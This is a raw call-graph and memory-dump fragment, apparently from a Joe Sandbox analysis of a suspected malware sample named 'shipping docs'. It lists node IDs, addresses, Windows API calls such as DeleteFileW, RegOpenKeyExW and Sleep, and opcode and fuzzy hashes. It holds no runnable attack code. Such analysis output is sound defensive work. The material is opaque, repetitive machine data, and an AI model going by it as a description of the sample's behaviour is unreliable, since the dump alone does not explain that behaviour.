61fc2a0 50584->50943 50585 61f9b67 50589 61fa15c 50588->50589 50591 66f6c78 3 API calls 50589->50591 50592 66f6b36 3 API calls 50589->50592 50593 66f6f64 3 API calls 50589->50593 50594 66f6f10 3 API calls 50589->50594 50590 61fa532 50590->50228 50591->50590 50592->50590 50593->50590 50594->50590 50596 61fa1e6 50595->50596 50598 66f6c78 3 API calls 50596->50598 50599 66f6b36 3 API calls 50596->50599 50600 66f6f64 3 API calls 50596->50600 50601 66f6f10 3 API calls 50596->50601 50597 61fa532 50597->50228 50598->50597 50599->50597 50600->50597 50601->50597 50603 61fa267 50602->50603 50605 66f6c78 3 API calls 50603->50605 50606 66f6b36 3 API calls 50603->50606 50607 66f6f64 3 API calls 50603->50607 50608 66f6f10 3 API calls 50603->50608 50604 61fa532 50604->50228 50605->50604 50606->50604 50607->50604 50608->50604 50610 61f92fd 50609->50610 50612 61fb5c1 3 API calls 50610->50612 50613 61fc2a0 3 API calls 50610->50613 50611 61f9b67 50612->50611 50613->50611 50615 61f9d6c 50614->50615 50622 684da38 LdrInitializeThunk 50615->50622 50616 61fa01c KiUserExceptionDispatcher 50618 61fa0bf 50616->50618 50623 684e9d8 2 API calls 50618->50623 50619 61fa0eb 50624 684f240 2 API calls 50619->50624 50620 61fa130 50625 66f6c78 3 API calls 50620->50625 50626 66f6b36 3 API calls 50620->50626 50627 66f6f64 3 API calls 50620->50627 50628 66f6f10 3 API calls 50620->50628 50621 61fa532 50621->50228 50622->50616 50623->50619 50624->50620 50625->50621 50626->50621 50627->50621 50628->50621 50630 61f9ded 50629->50630 50637 684da38 LdrInitializeThunk 50630->50637 50631 61fa01c KiUserExceptionDispatcher 50633 61fa0bf 50631->50633 50638 684e9d8 2 API calls 50633->50638 50634 61fa0eb 50639 684f240 2 API calls 50634->50639 50635 61fa130 50640 66f6c78 3 API calls 50635->50640 50641 66f6b36 3 API calls 50635->50641 50642 66f6f64 3 API calls 50635->50642 50643 66f6f10 3 API calls 50635->50643 50636 61fa532 50636->50228 50637->50631 50638->50634 50639->50635 50640->50636 50641->50636 50642->50636 
50643->50636 50645 61f9db1 50644->50645 50652 684da38 LdrInitializeThunk 50645->50652 50646 61fa01c KiUserExceptionDispatcher 50648 61fa0bf 50646->50648 50653 684e9d8 2 API calls 50648->50653 50649 61fa0eb 50654 684f240 2 API calls 50649->50654 50650 61fa130 50655 66f6c78 3 API calls 50650->50655 50656 66f6b36 3 API calls 50650->50656 50657 66f6f64 3 API calls 50650->50657 50658 66f6f10 3 API calls 50650->50658 50651 61fa532 50651->50228 50652->50646 50653->50649 50654->50650 50655->50651 50656->50651 50657->50651 50658->50651 50660 61f9e32 50659->50660 50672 684da38 LdrInitializeThunk 50660->50672 50661 61fa01c KiUserExceptionDispatcher 50663 61fa0bf 50661->50663 50673 684e9d8 2 API calls 50663->50673 50664 61fa0eb 50667 684f240 2 API calls 50664->50667 50665 61fa130 50668 66f6c78 3 API calls 50665->50668 50669 66f6b36 3 API calls 50665->50669 50670 66f6f64 3 API calls 50665->50670 50671 66f6f10 3 API calls 50665->50671 50666 61fa532 50666->50228 50667->50665 50668->50666 50669->50666 50670->50666 50671->50666 50672->50661 50673->50664 50675 61fa3ba 50674->50675 50677 66f6c78 3 API calls 50675->50677 50678 66f6b36 3 API calls 50675->50678 50679 66f6f64 3 API calls 50675->50679 50680 66f6f10 3 API calls 50675->50680 50676 61fa532 50676->50228 50677->50676 50678->50676 50679->50676 50680->50676 50682 61f9ebc 50681->50682 50695 684da38 LdrInitializeThunk 50682->50695 50683 61fa01c KiUserExceptionDispatcher 50685 61fa0bf 50683->50685 50689 684e9d8 2 API calls 50685->50689 50686 61fa0eb 50690 684f240 2 API calls 50686->50690 50687 61fa130 50691 66f6c78 3 API calls 50687->50691 50692 66f6b36 3 API calls 50687->50692 50693 66f6f64 3 API calls 50687->50693 50694 66f6f10 3 API calls 50687->50694 50688 61fa532 50688->50228 50689->50686 50690->50687 50691->50688 50692->50688 50693->50688 50694->50688 50695->50683 50697 61fa43e 50696->50697 50699 66f6c78 3 API calls 50697->50699 50700 66f6b36 3 API calls 50697->50700 50701 66f6f64 3 API calls 50697->50701 50702 66f6f10 3 API 
calls 50697->50702 50698 61fa532 50698->50228 50699->50698 50700->50698 50701->50698 50702->50698 50704 61f9c42 50703->50704 50705 61f9d24 KiUserExceptionDispatcher 50704->50705 50706 61f9d40 50705->50706 50717 684da38 LdrInitializeThunk 50706->50717 50707 61fa01c KiUserExceptionDispatcher 50709 61fa0bf 50707->50709 50718 684e9d8 2 API calls 50709->50718 50710 61fa0eb 50719 684f240 2 API calls 50710->50719 50711 61fa130 50713 66f6c78 3 API calls 50711->50713 50714 66f6b36 3 API calls 50711->50714 50715 66f6f64 3 API calls 50711->50715 50716 66f6f10 3 API calls 50711->50716 50712 61fa532 50712->50228 50713->50712 50714->50712 50715->50712 50716->50712 50717->50707 50718->50710 50719->50711 50721 61f9f46 50720->50721 50728 684da38 LdrInitializeThunk 50721->50728 50722 61fa01c KiUserExceptionDispatcher 50724 61fa0bf 50722->50724 50729 684e9d8 2 API calls 50724->50729 50725 61fa0eb 50730 684f240 2 API calls 50725->50730 50726 61fa130 50731 66f6c78 3 API calls 50726->50731 50732 66f6b36 3 API calls 50726->50732 50733 66f6f64 3 API calls 50726->50733 50734 66f6f10 3 API calls 50726->50734 50727 61fa532 50727->50228 50728->50722 50729->50725 50730->50726 50731->50727 50732->50727 50733->50727 50734->50727 50736 684da59 50735->50736 50737 61fa01c KiUserExceptionDispatcher 50736->50737 50738 684e6d7 LdrInitializeThunk 50736->50738 50737->50328 50739 684e6f3 50738->50739 50741 684e9fb 50740->50741 50778 684ed28 50741->50778 50742 61fa0eb 50744 684f240 50742->50744 50745 684f265 50744->50745 50747 684ee98 RegQueryValueExW 50745->50747 50748 684f281 50745->50748 50782 684ee8c 50745->50782 50747->50745 50748->50330 50750 66f6c96 50749->50750 50751 66f6f79 50750->50751 50786 66f6fbd 50750->50786 50791 66f7010 50750->50791 50795 66fa098 50750->50795 50802 66fa090 50750->50802 50751->50751 50758 66f6db8 50756->50758 50757 66f6f79 50758->50757 50759 66fa098 3 API calls 50758->50759 50760 66fa090 3 API calls 50758->50760 50761 66f6fbd 3 API calls 50758->50761 50762 66f7010 3 API 
calls 50758->50762 50759->50758 50760->50758 50761->50758 50762->50758 50765 66f6db8 50763->50765 50764 66f6f79 50765->50763 50765->50764 50766 66fa098 3 API calls 50765->50766 50767 66fa090 3 API calls 50765->50767 50768 66f6fbd 3 API calls 50765->50768 50769 66f7010 3 API calls 50765->50769 50766->50765 50767->50765 50768->50765 50769->50765 50771 66f6b49 50770->50771 50773 66f6b6c 50770->50773 50771->50331 50772 66f6b99 50772->50331 50773->50772 50774 66fa098 3 API calls 50773->50774 50775 66fa090 3 API calls 50773->50775 50776 66f6fbd 3 API calls 50773->50776 50777 66f7010 3 API calls 50773->50777 50774->50773 50775->50773 50776->50773 50777->50773 50779 684edfc 50778->50779 50780 684ed47 50778->50780 50779->50780 50781 684f240 2 API calls 50779->50781 50780->50742 50781->50780 50783 684f7c0 RegOpenKeyExW 50782->50783 50785 684f886 50783->50785 50785->50785 50787 66f6fd1 50786->50787 50788 66f6ff4 50786->50788 50787->50750 50789 66f7888 50788->50789 50809 61ff302 50788->50809 50789->50750 50792 66f7033 50791->50792 50793 66f7888 50792->50793 50794 61ff302 3 API calls 50792->50794 50793->50750 50794->50792 50796 66fa0c6 50795->50796 50797 66fa224 50796->50797 50857 66fa8b8 50796->50857 50873 66fa9aa 50796->50873 50889 66fa85f 50796->50889 50906 66fa870 50796->50906 50797->50750 50804 66fa098 50802->50804 50803 66fa224 50803->50750 50804->50803 50805 66fa85f 3 API calls 50804->50805 50806 66fa9aa 3 API calls 50804->50806 50807 66fa8b8 3 API calls 50804->50807 50808 66fa870 3 API calls 50804->50808 50805->50803 50806->50803 50807->50803 50808->50803 50810 61ff320 50809->50810 50811 61ff392 50810->50811 50814 61ff418 50810->50814 50818 61ff412 50810->50818 50811->50788 50815 61ff42b 50814->50815 50822 61ff4a2 50815->50822 50816 61ff48b 50816->50811 50819 61ff42b 50818->50819 50821 61ff4a2 3 API calls 50819->50821 50820 61ff48b 50820->50811 50821->50820 50823 61ff4cc 50822->50823 50831 61ff4e0 50822->50831 50823->50831 50834 61f75f0 50823->50834 50825 61ff52f 50826 
61ff539 50825->50826 50827 61ff553 50825->50827 50828 61f75f0 3 API calls 50826->50828 50826->50831 50840 61f7e40 50827->50840 50828->50831 50831->50816 50835 61f7600 50834->50835 50836 61f7624 50835->50836 50837 61f72f8 DeleteFileW DeleteFileW DeleteFileW 50835->50837 50838 61f72e8 DeleteFileW DeleteFileW DeleteFileW 50835->50838 50839 61f75f0 DeleteFileW DeleteFileW DeleteFileW 50835->50839 50836->50825 50837->50836 50838->50836 50839->50836 50842 61f7e7c 50840->50842 50843 61f7f57 50840->50843 50841 61f7e9f 50841->50831 50847 6840b9b 50841->50847 50852 6840bae 50841->50852 50842->50841 50842->50843 50845 61f84bf DeleteFileW DeleteFileW DeleteFileW 50842->50845 50846 61f8518 DeleteFileW DeleteFileW DeleteFileW 50842->50846 50843->50841 50844 61f6324 DeleteFileW 50843->50844 50844->50841 50845->50843 50846->50843 50848 6840baf 50847->50848 50849 6840ba1 50847->50849 50848->50849 50850 66f6fbd DeleteFileW DeleteFileW DeleteFileW 50848->50850 50851 66f7010 DeleteFileW DeleteFileW DeleteFileW 50848->50851 50849->50831 50850->50849 50851->50849 50853 6840baf 50852->50853 50854 6840bb5 50853->50854 50855 66f6fbd DeleteFileW DeleteFileW DeleteFileW 50853->50855 50856 66f7010 DeleteFileW DeleteFileW DeleteFileW 50853->50856 50854->50831 50855->50854 50856->50854 50858 66fa8d1 50857->50858 50859 66fa992 50858->50859 50860 66fac91 50858->50860 50868 66fa85f 3 API calls 50858->50868 50869 66fa9aa 3 API calls 50858->50869 50870 66fa8b8 3 API calls 50858->50870 50871 66fa870 3 API calls 50858->50871 50859->50797 50861 66facb9 50860->50861 50862 61ff302 3 API calls 50860->50862 50864 66fa85f 3 API calls 50860->50864 50865 66fa9aa 3 API calls 50860->50865 50866 66fa8b8 3 API calls 50860->50866 50867 66fa870 3 API calls 50860->50867 50872 2df38b0 DeleteFileW DeleteFileW DeleteFileW 50860->50872 50923 66fc0a9 50860->50923 50861->50797 50862->50860 50864->50860 50865->50860 50866->50860 50867->50860 50868->50858 50869->50858 50870->50858 50871->50858 50872->50860 50877 66fa9d8 
50873->50877 50874 66faa2b 50874->50797 50875 66fac91 50876 66facb9 50875->50876 50878 66fc0a9 3 API calls 50875->50878 50879 66fa85f 3 API calls 50875->50879 50880 66fa9aa 3 API calls 50875->50880 50881 66fa8b8 3 API calls 50875->50881 50882 66fa870 3 API calls 50875->50882 50887 2df38b0 DeleteFileW DeleteFileW DeleteFileW 50875->50887 50888 61ff302 3 API calls 50875->50888 50876->50797 50877->50874 50877->50875 50883 66fa85f 3 API calls 50877->50883 50884 66fa9aa 3 API calls 50877->50884 50885 66fa8b8 3 API calls 50877->50885 50886 66fa870 3 API calls 50877->50886 50878->50875 50879->50875 50880->50875 50881->50875 50882->50875 50883->50877 50884->50877 50885->50877 50886->50877 50887->50875 50888->50875 50890 66fa87e 50889->50890 50892 66fa8a1 50889->50892 50890->50797 50891 66facb9 50891->50797 50893 66fac91 50892->50893 50894 66fa992 50892->50894 50902 66fa85f 3 API calls 50892->50902 50903 66fa9aa 3 API calls 50892->50903 50904 66fa8b8 3 API calls 50892->50904 50905 66fa870 3 API calls 50892->50905 50893->50891 50895 2df38b0 DeleteFileW DeleteFileW DeleteFileW 50893->50895 50896 61ff302 3 API calls 50893->50896 50897 66fc0a9 3 API calls 50893->50897 50898 66fa85f 3 API calls 50893->50898 50899 66fa9aa 3 API calls 50893->50899 50900 66fa8b8 3 API calls 50893->50900 50901 66fa870 3 API calls 50893->50901 50894->50797 50895->50893 50896->50893 50897->50893 50898->50893 50899->50893 50900->50893 50901->50893 50902->50892 50903->50892 50904->50892 50905->50892 50907 66fa87e 50906->50907 50908 66fa8a1 50906->50908 50907->50797 50909 66fa992 50908->50909 50910 66fac91 50908->50910 50919 66fa85f 3 API calls 50908->50919 50920 66fa9aa 3 API calls 50908->50920 50921 66fa8b8 3 API calls 50908->50921 50922 66fa870 3 API calls 50908->50922 50909->50797 50911 66facb9 50910->50911 50912 2df38b0 DeleteFileW DeleteFileW DeleteFileW 50910->50912 50913 61ff302 3 API calls 50910->50913 50914 66fc0a9 3 API calls 50910->50914 50915 66fa85f 3 API calls 50910->50915 50916 66fa9aa 3 
API calls 50910->50916 50917 66fa8b8 3 API calls 50910->50917 50918 66fa870 3 API calls 50910->50918 50911->50797 50912->50910 50913->50910 50914->50910 50915->50910 50916->50910 50917->50910 50918->50910 50919->50908 50920->50908 50921->50908 50922->50908 50924 66fc0b3 50923->50924 50925 66fc0da 50924->50925 50927 66fcbc8 50924->50927 50925->50860 50929 66fcbcb 50927->50929 50930 66fcc2a 50927->50930 50928 66fcc36 50928->50925 50929->50925 50930->50928 50932 66fcc94 50930->50932 50935 66fcc28 DeleteFileW DeleteFileW DeleteFileW 50930->50935 50932->50925 50933 66fa870 3 API calls 50932->50933 50934 66fcd56 50933->50934 50934->50925 50935->50932 50937 61fb5e1 50936->50937 50938 61fb604 50936->50938 50937->50585 50939 61fb631 50938->50939 50940 61fb5c1 3 API calls 50938->50940 50941 61fc2a0 3 API calls 50938->50941 50942 61ff302 3 API calls 50938->50942 50939->50585 50940->50938 50941->50938 50942->50938 50944 61fc2c5 50943->50944 50945 61fc6cc 50944->50945 50946 61fb5c1 3 API calls 50944->50946 50947 61fc2a0 3 API calls 50944->50947 50948 61ff302 3 API calls 50944->50948 50945->50585 50946->50944 50947->50944 50948->50944 50952 61f7e37 50949->50952 50950 61f7f57 50953 61f7e9f 50950->50953 50979 61f6324 50950->50979 50952->50950 50952->50953 50960 61f84bf 50952->50960 50970 61f8518 50952->50970 50953->50307 50958 61f848b 50956->50958 50957 61f84a5 50957->50307 50958->50957 50959 61f6324 DeleteFileW 50958->50959 50959->50957 50961 61f84de 50960->50961 50962 61f84c3 50960->50962 50961->50950 50962->50961 50963 61f85c7 50962->50963 50965 61f8587 50962->50965 50964 61f85a7 50963->50964 50968 6840bae 2 API calls 50963->50968 50969 6840b9b 2 API calls 50963->50969 50964->50950 50965->50964 50966 61f86ba DeleteFileW 50965->50966 50967 61f86e7 50966->50967 50967->50950 50968->50964 50969->50964 50978 61f8556 50970->50978 50971 61f85c7 50972 61f85a7 50971->50972 50976 6840bae 2 API calls 50971->50976 50977 6840b9b 2 API calls 50971->50977 50972->50950 50973 61f86ba 
DeleteFileW 50975 61f86e7 50973->50975 50974 61f8587 50974->50972 50974->50973 50975->50950 50976->50972 50977->50972 50978->50971 50978->50974 50981 61f8668 DeleteFileW 50979->50981 50982 61f86e7 50981->50982 50982->50953 50984 2df2c1b 50983->50984 50989 2df30b4 50984->50989 50995 2df30c0 50984->50995 51001 2df30d0 50984->51001 50985 2df2c28 50985->50221 50990 2df30c0 50989->50990 51007 2df38b0 50990->51007 50991 2df31c5 50992 2df3142 50992->50991 50993 2df38b0 3 API calls 50992->50993 50993->50992 50996 2df30ca 50995->50996 51000 2df38b0 3 API calls 50996->51000 50997 2df31c5 50998 2df3142 50998->50997 50999 2df38b0 3 API calls 50998->50999 50999->50998 51000->50998 51002 2df30eb 51001->51002 51006 2df38b0 3 API calls 51002->51006 51003 2df31c5 51004 2df3142 51004->51003 51005 2df38b0 3 API calls 51004->51005 51005->51004 51006->51004 51008 2df38a5 51007->51008 51008->51007 51009 2df3972 51008->51009 51012 61f72f8 51008->51012 51029 61f72e8 51008->51029 51009->50992 51013 61f7311 51012->51013 51019 61f72f8 3 API calls 51013->51019 51020 61f72e8 3 API calls 51013->51020 51021 61f75f0 3 API calls 51013->51021 51014 61f734d 51017 61f7369 51014->51017 51024 61f7e1a 3 API calls 51014->51024 51025 61f7e40 3 API calls 51014->51025 51015 61f7401 51016 61f740a 51015->51016 51015->51017 51018 61f7376 51016->51018 51022 6840bae 3 API calls 51016->51022 51023 6840b9b 3 API calls 51016->51023 51017->51018 51026 61f72f8 3 API calls 51017->51026 51027 61f72e8 3 API calls 51017->51027 51028 61f75f0 3 API calls 51017->51028 51018->51009 51019->51014 51020->51014 51021->51014 51022->51018 51023->51018 51024->51015 51025->51015 51026->51018 51027->51018 51028->51018 51030 61f7311 51029->51030 51038 61f72f8 3 API calls 51030->51038 51039 61f72e8 3 API calls 51030->51039 51040 61f75f0 3 API calls 51030->51040 51031 61f7369 51033 61f7376 51031->51033 51043 61f72f8 3 API calls 51031->51043 51044 61f72e8 3 API calls 51031->51044 51045 61f75f0 3 API calls 51031->51045 51032 61f734d 
51032->51031 51036 61f7e1a 3 API calls 51032->51036 51037 61f7e40 3 API calls 51032->51037 51033->51009 51034 61f7401 51034->51031 51035 61f740a 51034->51035 51035->51033 51041 6840bae 3 API calls 51035->51041 51042 6840b9b 3 API calls 51035->51042 51036->51034 51037->51034 51038->51032 51039->51032 51040->51032 51041->51033 51042->51033 51043->51033 51044->51033 51045->51033 51046 61f6cc8 51047 61f6ce8 51046->51047 51048 61f6cf0 51046->51048 51050 61f6de4 51048->51050 51051 2df38b0 3 API calls 51048->51051 51049 61f6d94 51049->51050 51052 2df38b0 3 API calls 51049->51052 51051->51049 51052->51050 51053 6849718 51054 6849737 LdrInitializeThunk 51053->51054 51056 684978a 51054->51056 50179 66ff920 GetCurrentProcess 50180 66ff99a GetCurrentThread 50179->50180 50183 66ff993 50179->50183 50181 66ff9d7 GetCurrentProcess 50180->50181 50182 66ff9d0 50180->50182 50186 66ffa0d 50181->50186 50182->50181 50183->50180 50184 66ffa35 GetCurrentThreadId 50185 66ffa66 50184->50185 50186->50184 50187 2df0b50 50188 2df0b91 Sleep 50187->50188 50189 2df0bbe 50188->50189 51057 2df4c20 51058 2df4c34 51057->51058 51061 2df5272 51058->51061 51059 2df4c3d 51062 2df527b 51061->51062 51067 2df546e 51061->51067 51071 2df5454 51061->51071 51075 2df5347 51061->51075 51079 2df5358 51061->51079 51062->51059 51068 2df5481 51067->51068 51069 2df5493 51067->51069 51083 2df5750 51068->51083 51072 2df5407 51071->51072 51073 2df5493 51072->51073 51074 2df5750 2 API calls 51072->51074 51074->51073 51076 2df5358 51075->51076 51077 2df5493 51076->51077 51078 2df5750 2 API calls 51076->51078 51078->51077 51080 2df539c 51079->51080 51081 2df5493 51080->51081 51082 2df5750 2 API calls 51080->51082 51082->51081 51084 2df576e 51083->51084 51088 2df579f 51084->51088 51092 2df57b0 51084->51092 51085 2df577e 51085->51069 51089 2df57b0 51088->51089 51090 2df5814 RtlEncodePointer 51089->51090 51091 2df583d 51089->51091 51090->51091 51091->51085 51093 2df57ea 51092->51093 51094 2df5814 RtlEncodePointer 51093->51094 
51095 2df583d 51093->51095 51094->51095 51095->51085
Memory Dump Source
• Source File: 00000003.00000002.552253904.0000000006840000.00000040.00000800.00020000.00000000.sdmp, Offset: 06840000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6840000_shipping docs.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4a078ac258af679c399f6afd9fd6f9377782226a9ac8a33d52af3721601ee982
• Instruction ID: 41a557cf1fd7f333c595ce3e6aff5f87d2f0e0367e8be8a4ad183957c3d7fde0
• Opcode Fuzzy Hash: 4a078ac258af679c399f6afd9fd6f9377782226a9ac8a33d52af3721601ee982
• Instruction Fuzzy Hash: AC928930F002188FDB94ABB4D8586AEBBF6AF88308F158569D505DB391EB74DC45CB91
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32 ref: 066FF980
• GetCurrentThread.KERNEL32 ref: 066FF9BD
• GetCurrentProcess.KERNEL32 ref: 066FF9FA
• GetCurrentThreadId.KERNEL32 ref: 066FFA53
Memory Dump Source
• Source File: 00000003.00000002.550173381.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_66f0000_shipping docs.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: b55524448d6834dfb54f83b6934c7058cce3f824937d77ede84df952ddf51d28
• Instruction ID: 6c492f23b5d7a8c60e1b7d06f7fa6e6d1e99096d24096795f50152ac1c3cc326
• Opcode Fuzzy Hash: b55524448d6834dfb54f83b6934c7058cce3f824937d77ede84df952ddf51d28
• Instruction Fuzzy Hash: 1D5177B09006498FCB50CFA9D948BEEBBF1FF48314F14805AE548A7350C7345984CFA1
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetCurrentProcess.KERNEL32 ref: 066FF980
• GetCurrentThread.KERNEL32 ref: 066FF9BD
• GetCurrentProcess.KERNEL32 ref: 066FF9FA
• GetCurrentThreadId.KERNEL32 ref: 066FFA53
Memory Dump Source
• Source File: 00000003.00000002.550173381.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_66f0000_shipping docs.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 06a0713847183a9961508dee3197c018ea13eb7668ae69e54276cbc85920ef4a
• Instruction ID: 0b209eb5240ade52d31226a76b9a592bff46c5be0821b313a81061cea796beb2
• Opcode Fuzzy Hash: 06a0713847183a9961508dee3197c018ea13eb7668ae69e54276cbc85920ef4a
• Instruction Fuzzy Hash: 015155B09006498FDB50CFA9D988BAEBBF1FF48314F24806AE519A7350C7749884CFA5
Uniqueness

Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061F9D24
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: a2b9b66aec84f921cda3afe067c3e9d7bd8a96c9f34f123564a401ba29ca41b4
                                                                                              • Instruction ID: 26be1a4e5a1e598e123e760d14a10f3287f19de8af33f5b8cbf4ba97f24b7e52
                                                                                              • Opcode Fuzzy Hash: a2b9b66aec84f921cda3afe067c3e9d7bd8a96c9f34f123564a401ba29ca41b4
                                                                                              • Instruction Fuzzy Hash: BF12D834902259CFDB68DF74D898A9CB7B2BF49306F1085E9D60A66350CB359EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061F9D24
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: cd6917b0ca146c67969f9fa9de1d7c7e46c3c5bdc69ae885712671f2c614bb91
                                                                                              • Instruction ID: 34afd92ffe3dfcd7967503daf963d1aefc41c66542b5aa4d734b179b9c2056d6
                                                                                              • Opcode Fuzzy Hash: cd6917b0ca146c67969f9fa9de1d7c7e46c3c5bdc69ae885712671f2c614bb91
                                                                                              • Instruction Fuzzy Hash: 8D12C934902259CFDB68DF74D898A9CB7B2BF49306F1085E9D60A66350CB359EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061F9D24
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 959c42499c89c26103e17f623cccdbf1f6f68272948242ecd07f737ef24dbad4
                                                                                              • Instruction ID: fd95b60d35860e1521007e3e8f30fc2f77000eb45d108f27b53cfe8d8cc18f8c
                                                                                              • Opcode Fuzzy Hash: 959c42499c89c26103e17f623cccdbf1f6f68272948242ecd07f737ef24dbad4
                                                                                              • Instruction Fuzzy Hash: 2102C934912258CFDB68DF74D898A9CB7B2BF49306F1085E9D60A66350CB359EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061F9D24
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: a16fba03a33cf24c5e54bda42c4bd90ef6b9ae45d24162553225ddac7423be1b
                                                                                              • Instruction ID: 2eab353a361e5e0be093e885f915313d04b087400caeea7efbb18e131faa6d7c
                                                                                              • Opcode Fuzzy Hash: a16fba03a33cf24c5e54bda42c4bd90ef6b9ae45d24162553225ddac7423be1b
                                                                                              • Instruction Fuzzy Hash: 3F02C834902258CFDB68DF74D898A9CB7B2BF49306F1085E9D60A66350CB359EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061F9D24
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: c5fa9e37b772be690a375677ace0e9c71a3948d7f5917ccecc28e7d75f943e1c
                                                                                              • Instruction ID: 87f6f81c421c8fac0752b41c6013299fe96d42b877e41e10b4dfeb4d45845ea5
                                                                                              • Opcode Fuzzy Hash: c5fa9e37b772be690a375677ace0e9c71a3948d7f5917ccecc28e7d75f943e1c
                                                                                              • Instruction Fuzzy Hash: EC02C834902258CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB359EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: b24d634db48130f1b85a52c1abd7ac784be43618e1f6b7b9ac645f98ec51cae5
                                                                                              • Instruction ID: 36b5273f0d3700d06def81d8fd9d5e5933a606e1d2716f212524705c361d768f
                                                                                              • Opcode Fuzzy Hash: b24d634db48130f1b85a52c1abd7ac784be43618e1f6b7b9ac645f98ec51cae5
                                                                                              • Instruction Fuzzy Hash: CD02C834906218CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB799EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • KiUserExceptionDispatcher.NTDLL ref: 061FA0A0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.548518531.00000000061F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061F0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_61f0000_shipping docs.jbxd
                                                                                              Similarity
                                                                                              • API ID: DispatcherExceptionUser
                                                                                              • String ID:
                                                                                              • API String ID: 6842923-0
                                                                                              • Opcode ID: 4e4f21b7ff06d92600a3ad9470f89c7912af54e1697fa38aa0a32b0e2ba04075
                                                                                              • Instruction ID: a6256ca15da608abdebbe2a5a3c40f82b89078441e11650412ac6776ea111e41
                                                                                              • Opcode Fuzzy Hash: 4e4f21b7ff06d92600a3ad9470f89c7912af54e1697fa38aa0a32b0e2ba04075
                                                                                              • Instruction Fuzzy Hash: A2F1C734902258CFDB68DF74D898A9CB7B2BF49306F1045E9D60A66350CB399EC2CF61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
